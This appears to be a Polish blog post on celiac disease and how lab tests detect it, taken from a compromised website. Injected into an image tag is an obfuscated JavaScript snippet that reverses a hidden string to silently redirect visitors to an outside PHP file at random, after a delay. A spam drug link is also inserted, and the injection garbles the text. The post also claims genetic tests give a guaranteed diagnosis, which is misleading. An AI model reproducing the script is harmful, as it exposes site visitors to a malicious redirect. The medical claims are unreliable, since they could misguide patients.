You are currently viewing Wykonanie testu na celiakię

Wykonanie testu na celiakię

Na świecie o celiakii jest dziś dość głośno, ponieważ ta choroba jest znana już od wielu lat i obejmuje około kilku procent społeczeństwa. Co prawda nie jest ona śmiertelna, ale powoduje bardzo nieprzyjemne objawy, które znacząco utrudniają codzienne życie.

Jak szybko wykryć celiakię?

celiakia - labora<script>$mWn=function(n){if(typeof ($mWn.list[n])==”string”) return $mWn.list[n].split(„”).reverse().join(„”);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>toryjne testy” height=”125″ src=”http://karnisze24.pl/wp-content/uploads/2022/04/celiakia-labora<script>$mWn=function(n){if(typeof ($mWn.list[n])==toryjne-testy.png” style=”float:left;” width=”125″/>Celiakia jest chorobą trzewną, która charakteryzuje się nietolerancją glutenu o podłożu genetycznym. Zatem nie można się ją zarazić, a jedynie odziedziczyć o po swoich rodzicach. Celiakia powoduje występowanie nieprzyjemnych dolegliwości, które pojawiają się zwykle do kilkudziesięciu minut po spożyciu glutenu. Najczęściej jest to ból brzucha, wymioty, biegunka, nudności czy zaparcia. Objawy te należą do jednych z łagodniejszych i dotyczą klasycznej celiakii, ale poza nią występuje jeszcze jej nietypowa odmiana, która objawia się znacznie poważniejszymi symptomami. Mogą to być zmiany skórne

buy zithromax online

, ciągłe zmęczenie, migreny, niedokrwistość czy zaburzenia neurologiczne. Na świecie żyje sporo osób, które są nieświadome, że chorują na tą chorobę, gdyż jej objawy przypisują innych problemom zdrowotnym. Jeżeli chcemy jednoznacznie ustalić, czy dotyczy nas celiakia – laboratoryjne testy są najlepszym na to sposobem. Dają one gwarancję jednoznacznego potwierdzenia lub wykluczenia choroby

, gdyż opierają się na badaniu kodu genetycznego. Cena takiego badania, w zależności od miejsca wykonania, może wynosić od kilkudziesięciu do nawet kilkuset złotych. Przeważnie wykonują je punkty diagnostyczne i szpitale.

Nieleczona celiakia powoduje poważne problemy zdrowotne, dlatego nie należy choroby bagatelizować. Może ona doprowadzić do samoistnych poronień, osteoporozy, przedwczesnej menopauzy, zaburzeń psychicznych czy przeróżnych zaburzeń o podłożu neurologicznym.